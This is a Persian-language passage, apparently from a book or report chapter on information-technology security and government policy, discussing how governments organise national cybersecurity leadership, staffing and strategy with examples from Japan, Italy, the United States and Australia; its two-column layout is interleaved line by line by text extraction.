ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ ،ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ ﺷـﺎﻣﻞ ﺗﺄﺳـﻴﺲ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻫﺸﺪﺍﺭﺩﻫﻨﺪﺓ ﺍﺿﻄﺮﺍﺭﻱ ،ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ﺑـﺮ
ﺍﺳﺎﺱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺧﺪﺍﺩﻫﺎ ،ﻭ ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﻣﻮﺭﺩ
ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻭ ﺍﻟﺒﺘﻪ ﺑـﺎ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻣﻲﺑﺎﺷﺪ.
.۱۱ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺧـﻮﺩ ﺭﺍ
ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ،
ﻣﺸﻮﻕ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺷﻨﺪ.
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲ ﺍﻧﺪﻳﺸﻴﻢ ،ﺳﺆﺍﻻﺕ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺍﻗﺘـﺼﺎﺩ
ﺳﺎﺯﻣﺎﻧﻲ ﻣﻬﻤﻲ ﭘﻴﺶ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﻣﻨﺎﺳـﺐ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻭ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ
٢٦
ﭘﻴﺪﺍ ﻛﺮﺩ .ﭼﻨﺎﻧﭽﻪ ﺗﻨﻬﺎ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﻫـﺪﺍﻳﺖﻛﻨﻨـﺪﺓ ﺍﻣﻨﻴـﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ.
ﺳﺎﻳﺒﺮ ،ﺗﺮﻏﻴﺐ ﻣﺮﺩﻡ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﺷـﺪ، ﺍﻳﺘﺎﻟﻴﺎ ﻳﻚ ﻛﻤﻴﺘﺔ ﺩﺍﺧﻠﻲ ﻭﺯﺍﺭﺗﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺴﺌﻮﻻﻧﻪ •
ﺍﺧﺘﻴﺎﺭ ﻋﻤﻠﻲ ﺁﻥ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺮ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻣﺤـﺪﻭﺩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻛﻪ ﺗﻮﺳﻂ ﺩﭘﺎﺭﺗﻤـﺎﻥ ﻧـﻮﺁﻭﺭﻱ ﻭ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻳﻨﺪ ﻛﻪ ﺑـﻪ ﺭﻫﺒـﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻓﺘﺮ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻲﮔﺮﺩﺩ.
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺟـﺎﺯﻩ ﺩﻫﻨـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪ ﻫﺎ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ .ﻳـﻚ ﺭﻭﺵ ﺑـﺮﺍﻱ ﺍﻟـﺰﺍﻡ ﺩﺭ ﺳــﺎﻝ ۲۰۰۰ﻧﺨــﺴﺖ ﻭﺯﻳــﺮ ﮊﺍﭘــﻦ ﮔﺮﻭﻫــﻲ ﺭﺍ ﺑــﺮﺍﻱ •
ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎ ﺑـﻪ ﻣﻮﺍﻓﻘـﺖ ﺑـﺎ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛﺎﺑﻴﻨـﺔ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﻳـﻚ ﻣﻘـﺎﻡ ﻣـﺴﺌﻮﻝ ﺩﺭ ﺍﺩﺍﺭﺓ ﻣﺮﻛـﺰﻱ ﺩﻭﻟﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﺗﺎ ﺑﻬﺘـﺮ ﺑﺘﻮﺍﻧـﺪ ﻣﻌﻴﺎﺭﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻭﻟﺖ ﺑﺘﻮﺍﻧﺪ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻴﺎﻥ ﻭﺯﻳﺮﺍﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﻤﺎﻫﻨﮓ ﻧﻤﺎﻳﺪ .ﺍﻳـﻦ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺒﻌﻴﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺭﺩ ﻛﻨﺪ. ﮔﺮﻭﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﻋـﻀﻮ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ
٢٧
ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻭﺍﺑﺴﺘﻪ ﻭ ﻧﻴﺰ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻧﺪ.
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﺎ ﺣﺪﻱ ﺍﻳـﻦ ﺭﻭﺵ ﺭﺍ ﺩﺭ ﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﻭ ﺣـﻖ
ﺗﺄﻳﻴــﺪ ﻳــﺎ ﺭﺩ ﻫﺰﻳﻨــﻪﻫــﺎﻱ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻧﺘﺨﺎﺏ ﻣﺤﻞ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺩﻭﻟـﺖ ﺍﻫﻤﻴـﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ -ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ -ﺭﺍ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺯﻣـﺎﻥ ﺍﻧﺘـﺸﺎﺭ
ﺑﺮ ﻋﻬـﺪﺓ ﺩﻓﺘـﺮ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪﺑﻨـﺪﻱ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ،
ﮔﺬﺍﺷﺘﻪ ﺍﺳﺖ .ﻳﻚ ﺍﻗﺪﺍﻡ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟـﺰﺍﻡ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪ ﻫـﺎ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺍﺳﺖ .ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﻤﻴـﺰﻱ ﺳـﺎﻻﻧﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻭ ﻻ ﻣﺴﺌﻮﻝ ﺣﻔﻆ ﺍﺳﺮﺍﺭ ﺍﻣﻨﻴﺖ ﻣﻠـﻲ ﺍﺳـﺖ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﮔﺰﺍﺭﺵ ﻧﺘﺎﻳﺞ ﺁﻥ ﺑﻪ ﺍﺩﺍﺭﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷﺪ .ﻫﺮ ﺳﺎﺧﺘﺎﺭﻱ ﻛـﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ
ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ،ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺁﻥ ﺑﺎﻳـﺪ ﺍﺯ ﻃـﺮﻑ ﺩﻓﺘـﺮ ﺭﻳﺎﺳـﺖ ﻣﻄﺎﻟﺐ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻨﺘـﺸﺮ
ﺟﻤﻬﻮﺭﻱ ﻳﺎ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﺗﻌﻴـﻴﻦ ﮔـﺮﺩﺩ ﺗـﺎ ﺗﻤـﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ ﻧﺸﻮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﻧﺮﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ. ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﺁﻧﭽﻪ ﻛـﻪ ﻣﻌﺘﻘـﺪﻳﻢ ﻣـﺆﺛﺮﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ ،ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺭﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ
ﭼﺎﻟﺶ ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ ،ﻣﺸﻜﻞ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﺍﺳـﺖ. ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻳﺎ ﺷﺮﻛﺖ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻭﻟـﺖ ﻭ ﺗﺤـﺖ
ﺩﻭﻟﺘﻬﺎ ﺑﺮﺍﻱ ﺟﺬﺏ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﭘﺮﺳـﻨﻞ ﻣﺘﺨـﺼﺺ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻧﻈﺎﺭﺕ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻘﺎﻡ ﺍﺟﺮﺍﻳﻲ ﻛﺸﻮﺭ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ .ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺍﺋـﻪ
ﺑﻮﺭﺱ ﺗﺤﺼﻴﻠﻲ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺑـﺎ ﺍﻣﺎ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺳﺎﺯﻣﺎﻥ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻣـﺴﺌﻮﻟﻴﺖ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﻮﺭﺳﻬﺎ ،ﺍﻓﺮﺍﺩ ﺑـﺮﺍﻱ ﺳـﺎﻟﻬﺎﻱ ﻣﺸﺨـﺼﻲ ﺗﻌﻬـﺪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﻧـﻮﻋﻲ
ﺧﺪﻣﺖ ﺑﻪ ﺩﻭﻟﺖ ﭘﻴﺪﺍ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ .ﻳﻚ ﺭﺍﻩﺣﻞ ﻛﻮﺗﺎﻩﻣﺪﺕ ﻧﻴـﺰ "ﻓﺮﻣﺎﻧﺪﻫﻲ ﻣﻠﻲ" ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﺑﺘﻮﺍﻥ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛـﺮﺩ ﻛـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﻭ ﻣﺮﺣﻠـﻪﺍﻱ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﺑﺨـﺶ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﺳﻮﻱ ﺍﺟﺰﺍﻱ ﺩﻭﻟﺖ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﻣـﻮﺭﺩ
ﺧﺼﻮﺻﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻣﻘﻮﻟـﺔ
ﻛﺎﺭ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺗﻤﺎﻡ ﻳﺎ ﺑﺨـﺸﻲ ﺍﺯ ﺣﻘﻮﻗـﺸﺎﻥ ﺗﻮﺳـﻂ ﻛﺎﺭﻓﺮﻣـﺎﻱ
ﻲ ﺁﻧﻬﺎ ﭘﺮﺩﺍﺧﺖ ﮔﺮﺩﺩ .ﻣﺸﻜﻞ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺘﺮﺍﻟﻴﺎ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴـﺮ ﺟﺰﺍﻳـﻲ ۲۶
ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﻭ ﻫــﻢ ﺩﺭ ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﻛﺎﺭ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺣﻴﻄﻪ ﻛﻞ ﺩﻭﻟﺖ ﺑﺎﺷﺪ ﻭ ﻛﻤـﻲ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻣﻮﺍﺟﻬﺔ ﺩﻭﻟـﺖ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﺩﻭﻟﺘﻲ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ ،ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺑـﺎﻻﺗﺮﻳﻦ ﻣﻘـﺎﻡ ﺩﻭﻟﺘـﻲ
ﻣﺤﻠﻲ ﺗﺄﺳﻴﺲ ﺷﻮﻧﺪ .ﺭﺋﻴﺲ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﺗﻮﺳﻂ ﻳـﻚ ﻭﺯﻳـﺮ -ﺩﺭ
ﺑﺎ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺩﻳﮕﺮﻱ ﺷﻮﺩ ،ﭼﺮﺍﻛـﻪ ﺩﻭﻟـﺖ ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ ﺍﻳﻨﺠﺎ ﻭﺯﻳﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ -ﻣﻨﺼﻮﺏ ﻣﻲﺷـﻮﺩ ﻭ ﺗﻨﻬـﺎ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺭﺷـﺘﻪ ﺩﺳـﺘﻤﺰﺩ ﺑﻪ ﺍﻭ ﭘﺎﺳﺨﮕﻮﺳﺖ.
ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﭙﺮﺩﺍﺯﺩ. ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: ۲۷
http://www.kantei.go.jp/foreign/it/security/2000
/0519taisei.html
٢٣٧ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ
ﻛﺮﺩﻩﺍﻧﺪ ٢٩.ﺩﺭ ﺣﻘﻴﻘـﺖ ﺍﻣﻨﻴـﺖ ﻳـﻚ ﺟـﺰﺀ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ
ﺭﻭﻧﺪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺑـﺰﺍﺭ ﻣـﺆﺛﺮﻱ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣـﺎﻟﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺻـﻮﻝ ﺣﻘـﻮﻗﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﻣـﻮﺭﺩ
ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻣﻠـﻲ ﭼﻴـﺴﺘﻨﺪ ،ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﭼـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴـﻪ ﭘـﻴﺶﻧـﻮﻳﺲ ﺑﺮﻧﺎﻣـﺔ ﻣﻠـﻲ ﺗﻮﺳـﻌﻪ ﻓﻨـﺎﻭﺭﻱ
ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﺷﺪ ،ﻭ ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺍﺻـﻼﺣﺎﺗﻲ ﺩﺭ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﮊﺍﭘـﻦ ﺩﺭ
ﺑﺎﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﺩ .ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ
ﻣــﺎﺭﺱ ۲۰۰۱ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣــﺔ ﺍﻭﻟﻮﻳــﺖﺑﻨــﺪﻱ
٣٠ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ .ﺩﺭ ﺍﻳﻨﺠـﺎ ﻋﻤـﺪﺗﹰﺎ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺧﻮﺩ ﻣﻮﺳﻮﻡ ﺑﻪ e-Japanﺗﺮﻛﻴﺐ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻋﻨﺎﺻﺮ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ
ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺧﻮﺩ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻣﻲﺷﻮﻳﻢ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻧـﺪ.
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ،ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑﺮﺧـﻲ ﻋﻨﺎﺻـﺮ ﻭ ﺩﺭ ﺍﺩﺍﻣــﺔ ﺑﺨــﺶ ﭼﻬــﺎﺭﻡ ﻧﻘــﺶ ﺩﻭﻟــﺖ ﺭﺍ ﺩﺭ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ
ﺑﺨﺸﻬﺎﻱ ﻣﺸﺘﺮﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣــﻮﺭﺩ ﺑﺤــﺚ ﻭ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ
ﺍﺭﺯﻳــﺎﺑﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻣﻠــﻲ ﻭ ﺍﻧﺘــﺸﺎﺭ ﮔﺰﺍﺭﺷــﻬﺎﻱ .۱ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ .ﻣﺮﻭﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺗﻮﺍﻧـﺪ ﻓﻮﺍﻳـﺪ
